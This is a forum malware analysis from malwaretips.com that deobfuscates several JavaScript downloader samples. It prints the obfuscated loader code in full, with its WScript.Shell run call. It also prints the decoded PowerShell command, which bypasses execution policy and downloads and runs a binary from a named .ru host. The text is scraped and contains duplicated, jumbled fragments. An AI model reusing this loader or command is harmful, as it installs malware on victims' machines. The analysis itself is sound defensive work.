- May 14, 2016
- 1,597
https://malwaretips.com/threads/18-11-16-10.65618/
Thanks to @silversurfer
Edited :
Why this sample ?
Similar to some sample deobfuscation I made very quiclky (less than 20s).
Each time, they seems to take my remarks into account and improve some parts
1) What it looks like :
Look at the spoiler : in red, the most important parts (almost all the other parts are not very important, or completely useless).
Remember the method used against this family :
(1) find the real command line
- One long obfuscated string that is the command line of the run part
- One array of string : the different patterns to replace on the long String
- One array of chars : the different chars that will replace the patterns on the long strings
(2) find, between the numerous lines with parts useless, the only good line :
2) From previous version :
It didn't change a lot from other previous samples I have analysed.
2-1) The first time :
3) The current sample :
(1) A search on run => no result ...
=> it seems they have used in this sample another trick to avoid my easy method (run world)
(2) Let's search using the big function that should contain the command line, a parameter of the run method
We have find the famous function that returns the real command line.
=> method : a quick look at the content file :
This time : they used an array of strings that is joined to made a string
We have got the name of the function : bufosmy
A search on this name :
Let's verify :
A search on ewubq :
Let's understand how this function deobfuscate the command line
function bufosmy() {
return ocolr;
=> here, the end of the loop :
}
4) Conclusion :
Small modifications that don't really make harder to get all the malware parts.
run powershell.exe :
BILL-24436.js
7.js
Thanks to @silversurfer
Edited :
Added samples and difference with EURO_27507.js :
https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623
BILL-24436.js (see the link at the end)
https://malwaretips.com/threads/sim...bill-24436-js-7-js-updated.65637/#post-568227
7.jshttps://malwaretips.com/threads/sim...bill-24436-js-7-js-updated.65637/#post-568227
https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623
EURO_27507.js - 6/54Why this sample ?
Similar to some sample deobfuscation I made very quiclky (less than 20s).
Each time, they seems to take my remarks into account and improve some parts
1) What it looks like :
Look at the spoiler : in red, the most important parts (almost all the other parts are not very important, or completely useless).
var uhetu = '92278';
vidrimkyzt = 'wafe';
function iswer() {
vahuc = 'bicq';
function ofilxum() {
var wawpugw = typeof document4;
var yffapyffa = undefined;
function omide() {
var tesuxcarre = 'ygqony';
var agjobxex = "replace";
var xahlyrw = "38465";
function muwnyrx() {
var vqelle = '58690';
var erazyf = "gi";
function cileg() {
function ymajdeluc() {
function ikiredhu() {
var sumwyzu = 0;
var isevz = undefined;
var zawur = 1;
function nyjovyns() {
var lvoje = 18.4517;
var axirkuw = 'zyktiz';
var lwabgyguw = undefined;
var jobqedv = 0;
var rukaby = undefined;
var ujiwja = null;
function bufosmy() {
var ewubq = bufosmy();
if (lwabgyguw == 0) {
vidrimkyzt = 'wafe';
function iswer() {
var ohamho = 0;
return ohamho;
}return ohamho;
vahuc = 'bicq';
function ofilxum() {
var egassodca = 1;
return egassodca;
}return egassodca;
var wawpugw = typeof document4;
var yffapyffa = undefined;
function omide() {
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
var tesuxcarre = 'ygqony';
var agjobxex = "replace";
var xahlyrw = "38465";
function muwnyrx() {
var tojwolax = 1;
return tojwolax;
}return tojwolax;
var vqelle = '58690';
var erazyf = "gi";
function cileg() {
var ijahapso = false;
return ijahapso;
}return ijahapso;
function ymajdeluc() {
var ycdung = null;
return ycdung;
}return ycdung;
function ikiredhu() {
return 1;
}var sumwyzu = 0;
var isevz = undefined;
var zawur = 1;
function nyjovyns() {
var apdopi = null;
return apdopi;
}return apdopi;
var lvoje = 18.4517;
var axirkuw = 'zyktiz';
var lwabgyguw = undefined;
var jobqedv = 0;
var rukaby = undefined;
var ujiwja = null;
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
return ocolr;
}var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
if (!pfixyg) pfixyg = 0;
if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
switch (omide()) {
case true:
pfixyg++;
}if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
switch (omide()) {
case true:
var ovhugca = new RegExp(ugula, erazyf);
ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;
}ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;
pfixyg++;
return ocolr;
var ewubq = bufosmy();
if (lwabgyguw == 0) {
if (yffapyffa == 'nyja') {
if (ymajdeluc() == 'rfuknaj') {
} else {var ulxyl = 'egojubv';
if (ulxyl === 0) {
}if (ulxyl === 0) {
if (typeof vqelle == "string") {
}var ysxamhysyks = 6;
var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;
}var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;
if (ymajdeluc() == 'rfuknaj') {
if (typeof muwnyrx() == "number") {
}var rygetqy = undefined;
var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;
}var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;
var ciryrowi = 1;
var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) {
case '96146':
}var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) {
case '96146':
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) { //0
break;
case undefined:if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) { //0
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
break;
case null:if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
break;
var guhhepxe = WScript.CreateObject("WScript.Shell");
if (jobqedv === 0) {
if (jobqedv === 0) {
var thucxiw = undefined;
var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") {
} else {
if (aqobzuhni === "akremygxa") {
}
break;
case "igumy":var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") {
var upawkarkez = true;
switch (upawkarkez) {
case undefined:
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';
switch (upawkarkez) {
case undefined:
if (ofilxum() === undefined) {
break;
case 'ilqoqigm':var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
if (ofilxum() === undefined) {
break;
case null:var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
case true:var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;
case false:break;
if (ofilxum() === undefined) {
break;
}var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';
if (lvoje == 18.4517) {
var aqobzuhni = null;if (nyjovyns() === null) {
}var ixiqxamav = "wigabki";
var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;
}var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;
if (aqobzuhni === "akremygxa") {
kosaqoj = "peqfelef";
qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {
}
}qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {
var upitov = "udy";
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
case 'zqecmalqe':if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}
if (ikiredhu() === null) {
var icamge = 'qlisalyx';
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}
Remember the method used against this family :
(1) find the real command line
- One long obfuscated string that is the command line of the run part
- One array of string : the different patterns to replace on the long String
- One array of chars : the different chars that will replace the patterns on the long strings
(2) find, between the numerous lines with parts useless, the only good line :
Shell.run(commmandline, 0)
=> on the script this line is obfuscated :
=> on the script this line is obfuscated :
But : there are methods to find it, I have shown them on previous samples, but each time the new samples has modified it to my method fail
2) From previous version :
It didn't change a lot from other previous samples I have analysed.
2-1) The first time :
Quick search for run word :
We found :
2-2) 2nd old sample:We found :
case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;=> Shell.run(commmandline, 0)
=> fqopwytlu : 0 (find by a search on the file content for the var fqopwytlu)
=> yvedy() : a function that will returns the good deobfuscated command linethe the spoiler part
=> fqopwytlu : 0 (find by a search on the file content for the var fqopwytlu)
=> yvedy() : a function that will returns the good deobfuscated command linethe the spoiler part
function yvedy() {
This function returns ekihvub, a value that uses jaqinod, a string with a "strange" content
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
This is some string manipulations.
With the var names, and the content of the script, the real values are easy to be retrieved :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';
var odacik = /ejewca/gi;
var axucw = 'c';
var hyqzuski = /exozett/gi;
var ujcilf = 'e';
var jzehykli = /sipxuqm/gi;
var ymidv = 'a';
var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, a multiple "replace" is used, to clean the famous obfuscated string on jaqinod
Result :
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
This function returns ekihvub, a value that uses jaqinod, a string with a "strange" content
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
This is some string manipulations.
With the var names, and the content of the script, the real values are easy to be retrieved :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';
var odacik = /ejewca/gi;
var axucw = 'c';
var hyqzuski = /exozett/gi;
var ujcilf = 'e';
var jzehykli = /sipxuqm/gi;
var ymidv = 'a';
var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, a multiple "replace" is used, to clean the famous obfuscated string on jaqinod
Result :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe ""
it's easy to understand :
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
Quick search for run
We found :
=> this time, not directly the obfuscated Shell.run(commandline,0) part !
=> they use a var to put the word "run", to avoid tu get the important part directly.
We found :
=> this time, not directly the obfuscated Shell.run(commandline,0) part !
=> they use a var to put the word "run", to avoid tu get the important part directly.
=> var cimy = 'run'
but a search on cimy makes the job :
case null:
ittirra[cimy](xpoqys, xvafdyv);
break;=> xvafdyv = 0;
=> Shell.run(xpoqys, 0);
xpoqys : a var that hide a function to retrive the deobfuscated command line
A search give :
var xpoqys = mhuxezyd();
=> mhuxezyd() is the function that returns the deobfuscated command line string
=> Shell.run(xpoqys, 0);
xpoqys : a var that hide a function to retrive the deobfuscated command line
A search give :
var xpoqys = mhuxezyd();
=> mhuxezyd() is the function that returns the deobfuscated command line string
function mhuxezyd() {
Explanation :
two arrays are used for the replace part :
